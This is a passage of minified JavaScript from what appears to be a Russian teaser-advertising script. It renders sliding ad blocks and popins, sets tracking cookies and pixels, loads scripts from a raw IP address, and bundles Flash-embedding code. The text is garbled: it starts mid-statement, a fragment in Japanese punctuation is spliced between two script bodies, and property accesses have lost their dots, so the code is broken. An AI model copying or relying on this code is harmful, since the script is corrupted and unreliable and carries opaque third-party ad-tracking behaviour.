30px 5px 5px;background:url(" + xascriptsDomain + "img/bottom_l.png) no-repeat 100% bottom;"; t += "right:0;background:url(" + xascriptsDomain + "img/top_l.png) no-repeat 100% 0;"; break; default: B = "right", l += "right: 0;", u += "padding:0 5px 5px 30px;background:url(" + xascriptsDomain + "img/bottom_r.png) no-repeat 0 bottom;", t += "left:0;background:url(" + xascriptsDomain + "img/top_r.png) no-repeat 0 0;" } this.height = this.width = 0; h.innerHTML = '\x3cspan style\x3d"float: left;font: bold 14px Arial; color: #701C1F;"\x3e\u0427\u0418\u0422\u0410\u0419\u0422\u0415 \u0422\u0410\u041a\u0416\u0415\x3c/span\x3e\x3cspan style\x3d"float: right; font: 12px/16px Arial; color:#666;cursor: pointer;" id\x3d"close_' + e + '"\x3e\u0417\u0430\u043a\u0440\u044b\u0442\u044c\x3c/span\x3e\x3cdiv style\x3d"clear: both;"\x3e\x3c/div\x3e'; h.appendChild(p); p.style.cssText = t; h.style.cssText = u; h.id = e; gv() ? l += "position:fixed;" : (l += "position:absolute;", g.aa({F: f}), this.b(r, "scroll", function () { g.aa({F: f}) }, T)); f.style.cssText = l; f.appendChild(h); this.H(h, a); k.body.appendChild(f); f.style.width = a.width + a.widthUnit; l = f.offsetWidth - 35; h.style.width = 790 > l ? l + "px" : "755px"; this.sa(a, e); f.style.width = this.width + 35 + "px"; h.style[B] = "-" + this.width + "px"; h.style.width = this.width + "px"; f.style.height = this.height + 70 + "px"; h.style.height = this.height + 45 + "px"; p.style.width = f.style.width; f.style.display = "none"; this.b(r, "scroll", function () { b() }, T); this.b(r, "resize", function () { b() }, T); k.getElementById("close_" + e).onclick = function () { c(y) }; this.wrap = f; this.data = a; this.id = e; return this }; ga.prototype.sa = function (a, b) { function c(a, b) { a.style.cssText = nI[b]; eb(a, "mouseover", function () { a.style.cssText = nP[b]; "text" == b && no([a]) }, T); eb(a, "mouseout", function () { a.style.cssText = nI[b]; no([a]) }, T) } function d(a, b) { eb(a, "mouseover", function () { b.style.cssText = nPsPText; "TD" == a.tagName && no([b]) }, y); eb(a, "mouseout", function () { b.style.cssText = nIsPText; no([b]) }, y) } var e = this, f = k.createElement("table"), p = k.getElementById(b), h = k.createElement("tbody"), j = k.createDocumentFragment(), m = k.createElement("img"), n = this, q = s, l; if (!q)switch (q = {}, q.size = parseInt(a.bannerSize, 10) + 2 * parseInt(a.imgBorderWidth, 10), l = q.size + parseInt(a.imgMarginSize, 10), a.orientation) { case "over": q.margin = "0"; qC = "0 0 " + a.imgMarginSize + "px"; qm = "none"; ql = "center"; qA = {top: -(a.bannerSizeOnmouseover - a.bannerSize), left: -(a.bannerSizeOnmouseover - a.bannerSize) / 2}; break; case "left": q.margin = "0 0 0 " + l + "px"; qC = "0 -" + l + "px 0 0"; qm = "left"; ql = "left"; qA = {top: -(a.bannerSizeOnmouseover - a.bannerSize) / 2, left: -(a.bannerSizeOnmouseover - a.bannerSize)}; break; case "right": q.margin = "0 " + l + "px 0 0", qC = "0 0 0 -" + l + "px", qm = "right", ql = "left", qA = {top: -(a.bannerSizeOnmouseover - a.bannerSize) / 2, left: 0} } l = q; var u = gQ() ? "display:inline;zoom:1;" : "display:inline-block;", t = parseInt(a.textSize, 10), v = t + (parseInt(a.textMouseOnTextSize, 10) - parseInt(a.textSize, 10)), C = t + (parseInt(a.textMouseOnTeaserSize, 10) - parseInt(a.textSize, 10)); this.d = parseInt(a.textDivHeight, 10); this.I = {table: "margin:5px 0;table-layout:fixed;background:" + a.background + ";border-collapse:separate;border-spacing:" + a.blockMarginVert + "px " + a.blockMarginHoriz + "px;width:100%;border:" + a.borderWidth + "px " + a.borderType + " " + a.borderColor, D: "vertical-align:top;background:" + a.cellBackground + ";border:" + a.cellBorderWidth + "px " + a.cellBorderType + " " + a.cellBorderColor + ";cursor:pointer;text-align:" + ll + ";width:" + 100 / a.horizCount + "%", u: "z-index:1;margin:" + lC + ";position:relative;" + u + ";height:" + l.size + "px;width:" + l.size + "px;float:" + lm, h: "position:absolute;top:0;left:0;width:" + a.bannerSize + "px;height:" + a.bannerSize + "px;border:" + a.imgBorderWidth + "px " + a.imgBorderType + " " + a.imgBorderColor, text: "margin:" + l.margin + ";cursor:pointer;float:" + ll + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textFontBold ? "700" : "100") + ";font-size:" + t + a.textSizeUnit + ";font-family:" + a.textFont + ";color:" + a.textColor, sPText: "margin:" + l.margin + ";cursor:pointer;float:" + ll + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textFontBold ? "700" : "100") + ";font-size:" + t + a.textSizeUnit + ";font-family:" + a.textFont + ";color:" + a.textColor}; this.P = {table: "margin:5px 0;table-layout:fixed;background:" + a.backgroundOnmouseover + ";border-collapse:separate;border-spacing:" + a.blockMarginVert + "px " + a.blockMarginHoriz + "px;width:100%;border:" + a.borderWidth + "px " + a.borderType + " " + a.borderColor, D: "vertical-align:top;background:" + a.cellBackgroundOnmouseover + ";border:" + a.cellBorderWidth + "px " + a.cellBorderType + " " + a.cellBorderColor + ";cursor:pointer;text-align:" + ll + ";width:" + 100 / a.horizCount + "%", u: "z-index:5;margin:" + lC + ";position:relative;" + u + ";height:" + l.size + "px;width:" + l.size + "px;float:" + lm, h: "position:absolute;cursor:pointer;top:" + qAtop + "px;left:" + qAleft + "px;height:" + a.bannerSizeOnmouseover + "px;width:" + a.bannerSizeOnmouseover + "px;border:" + a.imgBorderWidth + "px " + a.imgBorderType + " " + a.imgBorderColor, text: "margin:" + l.margin + ";cursor:pointer;float:" + ll + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textMouseOnTextFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textMouseOnTextFontBold ? "700" : "100") + ";font-size:" + v + a.textMouseOnTextSizeUnit + ";font-family:" + a.textMouseOnTextFont + ";color:" + a.textMouseOnTextColor, sPText: "margin:" + l.margin + ";cursor:pointer;float:" + ll + ";height:" + (0 != this.d ? this.d + "px" : "auto") + ";text-decoration:" + ("false" != a.textMouseOnTeaserFontUnderline ? "underline" : "none") + ";display:block;font-weight:" + ("false" != a.textMouseOnTeaserFontBold ? "700" : "100") + ";font-size:" + C + a.textMouseOnTeaserSizeUnit + ";font-family:" + a.textMouseOnTeaserFont + ";color:" + a.textMouseOnTeaserColor}; this.ta = function () { 0 == this.d && (this.d = "over" == a.orientation ? 35 : a.bannerSize) }; r.globalInfo.arrBlocks = []; this.data = a; j.appendChild(f); c(f, "table"); for (l = q = 0; l < a.vertCount; l += 1) { u = k.createElement("tr"); for (t = 0; t < a.horizCount; t += 1) { var v = {D: k.createElement("td"), h: k.createElement("img"), text: k.createElement("span"), u: k.createElement("span")}, C = a.teasers[q], E = k.createElement("span"), D = k.createElement("a"); q++; for (var G in v)c(v[G], G), "td" == G && d(v[G], v.text); var H = C.trackingDomain; vhsrc = xaimgDomain + C.src; vhtitle = eB(C.title); vhalt = eB(C.title); vhsetAttribute("clickUri", C.clickUri); gQ() && (vhonclick = function () { this.href = H + gg(this.getAttribute("clickUri") + eG()) }); E.innerHTML = eB(C.title); v.text.className = "wzTextSpan"; v.text.appendChild(E); r.globalInfo.arrBlocks.push(v.text); vuclassName = "wzImgSpan"; vuappendChild(vh); D.target = "_blank"; D.href = C.trackingDomain + gg(C.clickUri); D.style.cssText = "text-decoration:none;display:block;"; D.setAttribute("clickUri", C.clickUri); D.onclick = function () { this.href = H + gg(this.getAttribute("clickUri") + e) }; D.appendChild(vu); D.appendChild(v.text); vDappendChild(D); u.appendChild(vD) } h.appendChild(u); f.appendChild(h) } m.src = a.teasers[0].impDomain + gg(a.trackShowUri); m.style.cssText = this.U; j.appendChild(m); p.appendChild(j); this.height = f.offsetHeight; this.width = f.offsetWidth; if ("px" != this.data.widthUnit) { var I = f.offsetWidth; r.onresize = function () { 10 < Math.abs(I - f.offsetWidth) && (no(), width = I = f.offsetWidth) } } }; E(Za, ga); Za.prototype.p = function (a) { var b = this, c = "wzPopin" + (new Date).getTime(), d = document.createElement("div"), e = document.createElement("div"), f = document.createElement("span"), k, h, j = "z-index:9999;overflow:hidden;height:0;width:100%;background:none;", l = "background:#fff;position:absolute;", m = "100" == a.height && "%" == a.heightUnit; if (m)switch (a.bannerPosition) { case 0: case 6: a.bannerPosition = 3; break; case 2: case 8: a.bannerPosition = 5 } switch (a.bannerPosition) { case 0: k = "bottom"; j += "top:0;left:0;"; l += "margin: 0 0 20px;bottom:0;left:0;right:0;"; h = "bottom"; break; case 2: k = "bottom"; j += "top:0;right:0;"; l += "margin: 0 0 20px;bottom:0;left:0;"; h = "bottom"; break; case 3: k = "right"; j += "top:0;left:0;"; l += "margin: 20px 0 0;bottom:0;top:0;right:0;"; h = "top"; break; case 5: k = "left"; j += "top:0;right:0;"; l += "margin: 20px 0 0;bottom:0;top:0;left:0;right:0;"; h = "top"; break; case 6: k = "top"; j += "bottom:0;left:0;"; l += "margin: 20px 0 0;top:0;left:0;right:0;"; h = "top"; break; default: k = "top", j += "bottom:0;right:0;", l += "margin: 20px 0 0;bottom:0;top:0;left:0;right:0;", h = "top" } this.width = this.height = 0; e.style.cssText = l; e.id = c; gv() ? j += "position:fixed;" : (j += "position:absolute;", g.aa({F: d}), r.onscroll = function () { g.aa({F: d}) }); d.style.cssText = j; d.appendChild(e); f.style.cssText = "position: absolute; " + h + ": -17px; right: 10px;font: 12px/17px Arial; color:#666;cursor: pointer;"; f.innerHTML = "\u0417\u0430\u043a\u0440\u044b\u0442\u044c"; setTimeout(function () { e.appendChild(f) }, 5E3); this.H(e, a); document.body.appendChild(d); d.style.width = a.width + a.widthUnit; e.style.width = d.offsetWidth - 0 + "px"; this.sa(a, c); m ? (d.style.height = "100%", e.style[k] = d.offsetWidth + "px", e.style.height = "100%") : (d.style.height = this.height + 20 + "px", e.style[k] = d.style.height, e.style.height = this.height + "px"); e.style.width = this.width + "px"; this.o(); f.onclick = function () { b.close(a, d) }; setTimeout(function () { var a = setInterval(function () { 0 < parseInt(e.style[k], 10) ? e.style[k] = parseInt(e.style[k], 10) - 10 + "px" : (e.style[k] = 0, clearInterval(a)) }, 20) }, 1E3); this.wrap = d; this.data = a; this.id = c; return this }; var Eb = new xa, Fb = new Ta, Gb = new Ua, Hb = new Va, Ib = new ca, Jb = new Wa, Kb = new ya, Lb = new Xa, Mb = new da, Nb = new ga, Ob = new Za, Pb = new Ya, g = new sb, x = new rb(xb) })(window, document, "eyJ2ZXJzaW9ucyI6eyJtcm90IjoiMTM4MTQ3OTUxMzA5NSIsImRpcmVjdCI6IjEzODE0Nzk1MTMwOTUiLCJzY3IiOiIxLzIyLmpzPzI0Iiwicm90IjoiMS8zLmpzPzI0IiwidGwiOiIxLzEyLmpzPzI0IiwiY29tbW9uIjoiMS8xLmpzPzI0IiwibXBwdW5kIjoiMTM4MTQ3OTUxMzA5NSIsImFzIjoiMS8yLmpzPzI0IiwiaWNxIjoiMTM4MTQ3OTUxMzA5NSIsImJyIjoiMS8xMS5qcz8yNCIsInZrbSI6IjEvMjEuanM_MjQiLCJ0c3IiOiIxLzE4LmpzPzI0IiwicGQiOiIxMzgxNDc5NTEzMDk1IiwicHB1bmQiOiIxMzgxNDc5NTEzMDk1Iiwic2dtIjoiMTM4MTQ3OTUxMzA5NSIsInBpbiI6IjEvMjMuanM_MjQiLCJqc2ZyIjoiMTM4MTQ3OTUxMzA5NSIsInBvcHVwIjoiMS80LmpzPzI0IiwibWRpcmVjdCI6IjEzODE0Nzk1MTMwOTUiLCJmciI6IjEzODE0Nzk1MTMwOTUiLCJ3YmwiOiIxMzgxNDc5NTEzMDk1IiwiZW0iOiIxMzgxNDc5NTEzMDk1IiwiY2YiOiIxLzE1LmpzPzI0In0sInNjcmlwdHNEb21haW4iOiJodHRwOi8vMTg4LjY0LjE3NC4yNS9qcy8iLCJydFVyaSI6Ii8_");
""、リンク: "aHR0cDovL3dpemFyZC10cmFmZnN0b2NrLmNvbS8 / dXRtX3NvdXJjZT1vdXJiYW5uZXImdXRtX21lZGl1bT1iYW5uZXImdXRtX2NhbXBhaWduPWJhbm5lcl9yZWc \ X3D"}、x86:3E3、IA: ""、WA: ""、XA: ""、IB: ""、ダ。 var s = void 0, y = !0, z = null, T = !1; (function (r, k, xb) { function bb(a) { return/[\\\"<>\.;]/.exec(a) != z && typeof encodeURIComponent != t ? encodeURIComponent(a) : a } function U(a, b) { if (cb) { var c = b ? "visible" : "hidden"; V && J(a) ? J(a).style.visibility = c : db("#" + a, "visibility:" + c) } } function db(a, b, c, d) { if (!nc || !nR) { var e = u.getElementsByTagName("head")[0]; if (e) { c = c && "string" == typeof c ? c : "screen"; d && (Da = L = z); if (!L || Da != c)d = u.createElement("style"), d.setAttribute("type", "text/css"), d.setAttribute("media", c), L = e.appendChild(d), nc && (ne && typeof u.styleSheets != t && 0 < u.styleSheets.length) && (L = u.styleSheets[u.styleSheets.length - 1]), Da = c; nc && ne ? L && typeof L.addRule == M && L.addRule(a, b) : L && typeof u.createTextNode != t && L.appendChild(u.createTextNode(a + " {" + b + "}")) } } } function la(a) { var b = nn; a = a.split("."); a[0] = parseInt(a[0], 10); a[1] = parseInt(a[1], 10) || 0; a[2] = parseInt(a[2], 10) || 0; return b[0] > a[0] || b[0] == a[0] && b[1] > a[1] || b[0] == a[0] && b[1] == a[1] && b[2] >= a[2] ? y : T } function J(a) { var b = z; try { b = u.getElementById(a) } catch (c) { } return b } function eb(a) { var b = J(a); b && "OBJECT" == b.nodeName && (nc && ne ? (b.style.display = "none", function () { if (4 == b.readyState) { var c = J(a); if (c) { for (var d in c)"function" == typeof c[d] && (c[d] = z); c.parentNode.removeChild(c) } } else setTimeout(arguments.callee, 10) }()) : b.parentNode.removeChild(b)) } function Ea(a, b, c) { var d, e = J(c); if (ni && 312 > ni)return d; if (e)if (typeof a.id == t && (a.id = c), nc && ne) { var f = "", p; for (p in a)a[p] != Object.prototype[p] && ("data" == p.toLowerCase() ? b.movie = a[p] : "styleclass" == p.toLowerCase() ? f += ' class\x3d"' + a[p] + '"' : "classid" != p.toLowerCase() && (f += " " + p + '\x3d"' + a[p] + '"')); p = ""; for (var h in b)b[h] != Object.prototype[h] && (p += '\x3cparam name\x3d"' + h + '" value\x3d"' + b[h] + '" /\x3e'); e.outerHTML = '\x3cobject classid\x3d"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' + f + "\x3e" + p + "\x3c/object\x3e"; ma[ma.length] = a.id; d = J(a.id) } else { h = u.createElement(M); h.setAttribute("type", na); for (var j in a)a[j] != Object.prototype[j] && ("styleclass" == j.toLowerCase() ? h.setAttribute("class", a[j]) : "classid" != j.toLowerCase() && h.setAttribute(j, a[j])); for (f in b)b[f] != Object.prototype[f] && "movie" != f.toLowerCase() && (a = h, p = f, j = b[f], c = u.createElement("param"), c.setAttribute("name", p), c.setAttribute("value", j), a.appendChild(c)); e.parentNode.replaceChild(h, e); d = h } return d } function Fa(a) { var b = u.createElement("div"); if (ne && nc)b.innerHTML = a.innerHTML; else if (a = a.getElementsByTagName(M)[0])if (a = a.childNodes)for (var c = a.length, d = 0; d < c; d++)!(1 == a[d].nodeType && "PARAM" == a[d].nodeName) && 8 != a[d].nodeType && b.appendChild(a[d].cloneNode(y)); return b } function yb(a) { if (nc && ne && 4 != a.readyState) { var b = u.createElement("div"); a.parentNode.insertBefore(b, a); b.parentNode.replaceChild(Fa(a), b); a.style.display = "none"; (function () { 4 == a.readyState ? a.parentNode.removeChild(a) : setTimeout(arguments.callee, 10) })() } else a.parentNode.replaceChild(Fa(a), a) } function Ga(a, b, c, d) { oa = y; Ha = d || z; fb = {success: T, id: c}; var e = J(c); if (e) { "OBJECT" == e.nodeName ? (ea = Fa(e), pa = z) : (ea = e, pa = c); a.id = gb; if (typeof a.width == t || !/%$/.test(a.width) && 310 > parseInt(a.width, 10))a.width = "310"; if (typeof a.height == t || !/%$/.test(a.height) && 137 > parseInt(a.height, 10))a.height = "137"; u.title = u.title.slice(0, 47) + " - Flash Player Installation"; d = nc && ne ? "ActiveX" : "PlugIn"; d = "MMredirectURL\x3d" + G.location.toString().replace(/&/g, "%26") + "\x26MMplayerType\x3d" + d + "\x26MMdoctitle\x3d" + u.title; bs = typeof bs != t ? bs + ("\x26" + d) : d; nc && (ne && 4 != e.readyState) && (d = u.createElement("div"), c += "SWFObjectNew", d.setAttribute("id", c), e.parentNode.insertBefore(d, e), e.style.display = "none", function () { 4 == e.readyState ? e.parentNode.removeChild(e) : setTimeout(arguments.callee, 10) }()); Ea(a, b, c) } } function Ia() { return!oa && la("6.0.65") && (ne || nR) && !(ni && 312 > ni) } function Ja(a) { var b = z; if ((a = J(a)) && "OBJECT" == a.nodeName)typeof a.SetVariable != t ? b = a : (a = a.getElementsByTagName(M)[0]) && (b = a); return b } function Ka() { var a = P.length; if (0 < a)for (var b = 0; b < a; b++) { var c = P[b].id, d = P[b].fa, e = {success: T, id: c}; if (0 < nn[0]) { var f = J(c); if (f)if (la(P[b].qa) && !(ni && 312 > ni))U(c, y), d && (e.success = y, eS = Ja(c), d(e)); else if (P[b].O && Ia()) { e = {}; e.data = P[b].O; e.width = f.getAttribute("width") || "0"; e.height = f.getAttribute("height") || "0"; f.getAttribute("class") && (e.jb = f.getAttribute("class")); f.getAttribute("align") && (e.align = f.getAttribute("align")); for (var p = {}, f = f.getElementsByTagName("param"), h = f.length, j = 0; j < h; j++)"movie" != f[j].getAttribute("name").toLowerCase() && (p[f[j].getAttribute("name")] = f[j].getAttribute("value")); Ga(e, p, c, d) } else yb(f), d && d(e) } else if (U(c, y), d) { if ((c = Ja(c)) && typeof c.SetVariable != t)e.success = y, eS = c; d(e) } } } function hb(a) { if (typeof G.addEventListener != t)G.addEventListener("load", a, T); else if (typeof u.addEventListener != t)u.addEventListener("load", a, T); else if (typeof G.attachEvent != t) { var b = G; b.attachEvent("onload", a); Y[Y.length] = [b, "onload", a] } else if ("function" == typeof G.onload) { var c = G.onload; G.onload = function () { c(); a() } } else G.onload = a } function ib(a) { V ? a() : qa[qa.length] = a } function Z() { if (!V) { try { var a = u.getElementsByTagName("body")[0].appendChild(u.createElement("span")); a.parentNode.removeChild(a) } catch (b) { return } V = y; for (var a = qa.length, c = 0; c < a; c++)qa[c]() } } function jb(a) { return/[\\\"<>\.;]/.exec(a) != z && typeof encodeURIComponent != v ? encodeURIComponent(a) : a } function W(a, b) { if (kb) { var c = b ? "visible" : "hidden"; X && K(a) ? K(a).style.visibility = c : lb("#" + a, "visibility:" + c) } } function lb(a, b, c, d) { if (!mc || !mR) { var e = l.getElementsByTagName("head")[0]; if (e) { c = c && "string" == typeof c ? c : "screen"; d && (La = N = z); if (!N || La != c)d = l.createElement("style"), d.setAttribute("type", "text/css"), d.setAttribute("media", c), N = e.appendChild(d), mc && (me && typeof l.styleSheets != v && 0 < l.styleSheets.length) && (N = l.styleSheets[l.styleSheets.length - 1]), La = c; mc && me ? N && typeof N.addRule == O && N.addRule(a, b) : N && typeof l.createTextNode != v && N.appendChild(l.createTextNode(a + " {" + b + "}")) } } } function ra(a) { var b = mn; a = a.split("."); a[0] = parseInt(a[0], 10); a[1] = parseInt(a[1], 10) || 0; a[2] = parseInt(a[2], 10) || 0; return b[0] > a[0] || b[0] == a[0] && b[1] > a[1] || b[0] == a[0] && b[1] == a[1] && b[2] >= a[2] ? y : T } function K(a) { var b = z; try { b = l.getElementById(a) } catch (c) { } return b } function mb(a) { var b = K(a); b && "OBJECT" == b.nodeName && (mc && me ? (b.style.display = "none", function () { if (4 == b.readyState) { var c = K(a); if (c) { for (var d in c)"function" == typeof c[d] && (c[d] = z); c.parentNode.removeChild(c) } } else setTimeout(arguments.callee, 10) }()) : b.parentNode.removeChild(b)) } function Ma(a, b, c) { var d, e = K(c); if (mi && 312 > mi)return d; if (e)if (typeof a.id == v && (a.id = c), mc && me) { var f = "", p; for (p in a)a[p] != Object.prototype[p] && ("data" == p.toLowerCase() ? b.movie = a[p] : "styleclass" == p.toLowerCase() ? f += ' class\x3d"' + a[p] + '"' : "classid" != p.toLowerCase() && (f += " " + p + '\x3d"' + a[p] + '"')); p = ""; for (var h in b)b[h] != Object.prototype[h] && (p += '\x3cparam name\x3d"' + h + '" value\x3d"' + b[h] + '" /\x3e'); e.outerHTML = '\x3cobject classid\x3d"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' + f + "\x3e" + p + "\x3c/object\x3e"; sa[sa.length] = a.id; d = K(a.id) } else { h = l.createElement(O); h.setAttribute("type", ta); for (var j in a)a[j] != Object.prototype[j] && ("styleclass" == j.toLowerCase() ? h.setAttribute("class", a[j]) : "classid" != j.toLowerCase() && h.setAttribute(j, a[j])); for (f in b)b[f] != Object.prototype[f] && "movie" != f.toLowerCase() && (a = h, p = f, j = b[f], c = l.createElement("param"), c.setAttribute("name", p), c.setAttribute("value", j), a.appendChild(c)); e.parentNode.replaceChild(h, e); d = h } return d } function Na(a) { var b = l.createElement("div"); if (me && mc)b.innerHTML = a.innerHTML; else if (a = a.getElementsByTagName(O)[0])if (a = a.childNodes)for (var c = a.length, d = 0; d < c; d++)!(1 == a[d].nodeType && "PARAM" == a[d].nodeName) && 8 != a[d].nodeType && b.appendChild(a[d].cloneNode(y)); return b } function zb(a) { if (mc && me && 4 != a.readyState) { var b = l.createElement("div"); a.parentNode.insertBefore(b, a); b.parentNode.replaceChild(Na(a), b); a.style.display = "none"; (function () { 4 == a.readyState ? a.parentNode.removeChild(a) : setTimeout(arguments.callee, 10) })() } else a.parentNode.replaceChild(Na(a), a) } function Oa(a, b, c, d) { ua = y; Pa = d || z; nb = {success: T, id: c}; var e = K(c); if (e) { "OBJECT" == e.nodeName ? (fa = Na(e), va = z) : (fa = e, va = c); a.id = ob; if (typeof a.width == v || !/%$/.test(a.width) && 310 > parseInt(a.width, 10))a.width = "310"; if (typeof a.height == v || !/%$/.test(a.height) && 137 > parseInt(a.height, 10))a.height = "137"; l.title = l.title.slice(0, 47) + " - Flash Player Installation"; d = mc && me ? "ActiveX" : "PlugIn"; d = "MMredirectURL\x3d" + H.location.toString().replace(/&/g, "%26") + "\x26MMplayerType\x3d" + d + "\x26MMdoctitle\x3d" + l.title; bs = typeof bs != v ? bs + ("\x26" + d) : d; mc && (me && 4 != e.readyState) && (d = l.createElement("div"), c += "SWFObjectNew", d.setAttribute("id", c), e.parentNode.insertBefore(d, e), e.style.display = "none", function () { 4 == e.readyState ? e.parentNode.removeChild(e) : setTimeout(arguments.callee, 10) }()); Ma(a, b, c) } } function Qa() { return!ua && ra("6.0.65") && (me || mR) && !(mi && 312 > mi) } function Ra(a) { var b = z; if ((a = K(a)) && "OBJECT" == a.nodeName)typeof a.SetVariable != v ? b = a : (a = a.getElementsByTagName(O)[0]) && (b = a); return b } function Sa() { var a = Q.length; if (0 < a)for (var b = 0; b < a; b++) { var c = Q[b].id, d = Q[b].fa, e = {success: T, id: c}; if (0 < mn[0]) { var f = K(c); if (f)if (ra(Q[b].qa) && !(mi && 312 > mi))W(c, y), d && (e.success = y, eS = Ra(c), d(e)); else if (Q[b].O && Qa()) { e = {}; e.data = Q[b].O; e.width = f.getAttribute("width") || "0"; e.height = f.getAttribute("height") || "0"; f.getAttribute("class") && (e.jb = f.getAttribute("class")); f.getAttribute("align") && (e.align = f.getAttribute("align")); for (var p = {}, f = f.getElementsByTagName("param"), h = f.length, j = 0; j < h; j++)"movie" != f[j].getAttribute("name").toLowerCase() && (p[f[j].getAttribute("name")] = f[j].getAttribute("value")); Oa(e, p, c, d) } else zb(f), d && d(e) } else if (W(c, y), d) { if ((c = Ra(c)) && typeof c.SetVariable != v)e.success = y, eS = c; d(e) } } } function pb(a) { if (typeof H.addEventListener != v)H.addEventListener("load", a, T); else if (typeof l.addEventListener != v)l.addEventListener("load", a, T); else if (typeof H.attachEvent != v) { var b = H; b.attachEvent("onload", a); aa[aa.length] = [b, "onload", a] } else if ("function" == typeof H.onload) { var c = H.onload; H.onload = function () { c(); a() } } else H.onload = a } function qb(a) { X ? a() : wa[wa.length] = a } function ba() { if (!X) { try { var a = l.getElementsByTagName("body")[0].appendChild(l.createElement("span")); a.parentNode.removeChild(a) } catch (b) { return } X = y; for (var a = wa.length, c = 0; c < a; c++)wa[c]() } } function E(a, b) { function c() { } c.prototype = b.prototype; a.prototype = new c; a.prototype.constructor = a; a.nb = b.prototype; b.prototype.constructor == Object.prototype.constructor && (b.prototype.constructor = b) } function rb(a) { this.a = g.parseJSON(gL(a)); r.globalInfo = {}; g.log(this.a); if (this.a.ukDomain && this.a.ukUri && !r.udata && !this.a.dontGoToUK) { var b = this, c = setTimeout(function () { b.oa() }, 5E3); g.da(this.a.ukDomain, this.a.ukUri, function (a) { clearTimeout(c); g.parseJSON(gL(a)); r.globalInfo.udata = a; b.oa() }, "jsf") } else this.a.foreignUid || this.Ba(this.a.matchingUrl), this.oa() } function sb() { } function I() { } function xa() { } function Ta() { } function Ua() { } function Va() { } function ca() { } function Wa() { } function ya() { } function Xa() { } function Ya() { } function da() { } function ga() { } function Za() { } var v = "undefined", O = "object", ta = "application/x-shockwave-flash", ob = "SWFObjectExprInst", H = r, l = k, R = navigator, tb = T, wa = [function () { if (tb) { var a = l.getElementsByTagName("body")[0], b = l.createElement(O); b.setAttribute("type", ta); var c = a.appendChild(b); if (c) { var d = 0; (function () { if (typeof c.GetVariable != v) { var e = c.GetVariable("$version"); e && (e = e.split(" ")[1].split(","), mn = [parseInt(e[0], 10), parseInt(e[1], 10), parseInt(e[2], 10)]) } else if (10 > d) { d++; setTimeout(arguments.callee, 10); return } a.removeChild(b); c = z; Sa() })() } else Sa() } else Sa() }], Q = [], sa = [], aa = [], fa, va, Pa, nb, X = T, ua = T, N, La, kb = y, m, Ab = typeof l.getElementById != v && typeof l.getElementsByTagName != v && typeof l.createElement != v, za = R.userAgent.toLowerCase(), Aa = R.platform.toLowerCase(), Bb = Aa ? /win/.test(Aa) : /win/.test(za), Cb = Aa ? /mac/.test(Aa) : /mac/.test(za), Db = /webkit/.test(za) ? parseFloat(za.replace(/^.*webkit\/(\d+(\.\d+)?).*$/, "$1")) : T, $a = !+"\v1", ha = [0, 0, 0], C = z; if (typeof R.plugins != v && typeof R.plugins["Shockwave Flash"] == O) { if ((C = R.plugins["Shockwave Flash"].description) && !(typeof R.mimeTypes != v && R.mimeTypes[ta] && !R.mimeTypes[ta].enabledPlugin))tb = y, $a = T, C = C.replace(/^.*\s+(\S+\s+\S+$)/, "$1"), ha[0] = parseInt(C.replace(/^(.*)\..*$/, "$1"), 10), ha[1] = parseInt(C.replace(/^.*\.(.*)\s.*$/, "$1"), 10), ha[2] = /[a-zA-Z]/.test(C) ? parseInt(C.replace(/^.*[a-zA-Z]+(.*)$/, "$1"), 10) : 0 } else if (typeof H.ActiveXObject != v)try { var ub = new ActiveXObject("ShockwaveFlash.ShockwaveFlash"); if (ub && (C = ub.GetVariable("$version")))$a = y, C = C.split(" ")[1].split(","), ha = [parseInt(C[0], 10), parseInt(C[1], 10), parseInt(C[2], 10)] } catch (Ub) { } m = {j: Ab, n: ha, i: Db, c: $a, e: Bb, R: Cb}; mj && ((typeof l.readyState != v && "complete" == l.readyState || typeof l.readyState == v && (l.getElementsByTagName("body")[0] || l.body)) && ba(), X || (typeof l.addEventListener != v && l.addEventListener("DOMContentLoaded", ba, T), mc && me && (l.attachEvent("onreadystatechange", function () { "complete" == l.readyState && (l.detachEvent("onreadystatechange", arguments.callee), ba()) }), H == top && function () { if (!X) { try { l.La.doScroll("left") } catch (a) { setTimeout(arguments.callee, 0); return } ba() } }()), mi && function () { X || (/loaded|complete/.test(l.readyState) ? ba() : setTimeout(arguments.callee, 0)) }(), pb(ba))); mc && me && r.attachEvent("onunload", function () { for (var a = aa.length, b = 0; b < a; b++)aa[b][0].detachEvent(aa[b][1], aa[b][2]); a = sa.length; for (b = 0; b < a; b++)mb(sa[b]); for (var c in m)m[c] = z; m = z; for (var d in gw)gw[d] = z; gw = z }); sb.prototype = {Y: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_", U: "left:-10000px;top:-10000px;height:1px;width:1px;position:absolute;", Q: function () { return!r.addEventListener && !r.XMLHttpRequest && r.attachEvent }, v: function () { if ("BackCompat" == k.compatMode && 10 > g.Xa())return T; var a = k.createElement("div"); a.style.cssText = "position:fixed"; return a.style.position.match("fixed") ? y : T }, Ya: function (a) { a.matchUrl && (this.X(a.matchUrl).style.cssText = this.U) }, ga: function (a) { if (0 == a.limit && 0 == a.period)return y; if (this.la(a.periodName) == z) { var b = parseInt(this.la(a.limitName)); if (0 == a.limit || isNaN(b) || b < a.limit)return y } return T }, Xa: function () { var a = 999; -1 != navigator.appVersion.indexOf("MSIE") && (a = parseFloat(navigator.appVersion.split("MSIE")[1])); return a }, Ea: function (a) { var b = new Date, c = parseInt(this.la(a.limitName), 10), c = isNaN(c) ? 1 : c + 1; b.setTime(b.getTime() + 6E4 * parseInt(a.period, 10)); this.ra(a.periodName, 1, b, "/"); b.setTime(b.getTime() + 432E5); this.ra(a.limitName, c, b, "/") }, ra: function (a, b) { var c = arguments, d = c.length, e = 2 < d ? c[2] : z, f = 3 < d ? c[3] : z, p = 4 < d ? c[4] : z; k.cookie = a + "\x3d" + encodeURIComponent(b) + (e == z ? "" : "; expires\x3d" + e.toGMTString()) + (f == z ? "" : "; path\x3d" + f) + (p == z ? "" : "; domain\x3d" + p) + ((5 < d ? c[5] : T) == y ? 